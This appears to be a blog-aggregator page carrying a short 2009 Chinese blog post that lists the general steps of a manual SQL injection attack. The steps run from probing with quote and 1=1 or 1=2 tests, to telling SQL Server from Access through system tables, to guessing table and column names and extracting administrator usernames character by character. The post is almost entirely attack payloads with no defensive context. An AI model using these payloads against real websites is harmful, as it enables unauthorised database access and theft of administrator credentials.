惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

D
DataBreaches.Net
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
云风的 BLOG
云风的 BLOG
B
Blog
博客园 - Franky
I
InfoQ
A
About on SuperTechFans
博客园_首页
L
LangChain Blog
量子位
腾讯CDC
Microsoft Security Blog
Microsoft Security Blog
博客园 - 【当耐特】
美团技术团队
V
V2EX
Apple Machine Learning Research
Apple Machine Learning Research
雷峰网
雷峰网
MongoDB | Blog
MongoDB | Blog
Microsoft Azure Blog
Microsoft Azure Blog
月光博客
月光博客
T
The Blog of Author Tim Ferriss
P
Proofpoint News Feed
G
Google Developers Blog
Last Week in AI
Last Week in AI

博客园 - 张天利

换窝了! 性能监视器 SQL Server下如何对数据库的存储过程进行单元测试 LoadRunner9.5Cracker DataBuilder CookieReader URLResponseTime小工具 warning MSB4126(自动构建过程中网站发布不了) TFS端口列表 双色球自动选号工具 QQ开聊工具 SQLServer2005数据库同步过程 TFS2008命令行注释 查看源代码文件每一行进行更改的用户与时间信息 TFS2008从试用版升级到正式版方法 TF30170解决源代码管理文件夹的名称重复问题-解决方法2 TF30170解决源代码管理文件夹的名称重复问题 LoadRunner-ANSI C 脚本的常规 API 函数(其中包括所有协议,但 Java、VB 和 GUI 除外) 禁止TFS2008客户端自动登录TFS2008服务器.
sql注入的一般步骤
张天利 · 2009-10-20 · via 博客园 - 张天利

Posted on 2009-10-20 09:35  张天利  阅读(619)  评论(0)    收藏  举报

1、判断是否存在注入的可能。 ',and user>0, and 1=1,and 1=2.
2、判断数据库类型。and (select count(*) from sysobjects)>0 (sqlserver),
     and (select count(*) from msysobjects)>0 (Access).
3、猜解数据表。 and (select count(*) from user)>0.
4、猜解列名。 and (select count(username) from admins)>0.
5、猜解第一条记录的长度。and (select top 1 len(username) from admins)>0.
6、猜解字符。 and (select top 1 asc(mid(username,1,1)) from admins)>0.
至此注入完成。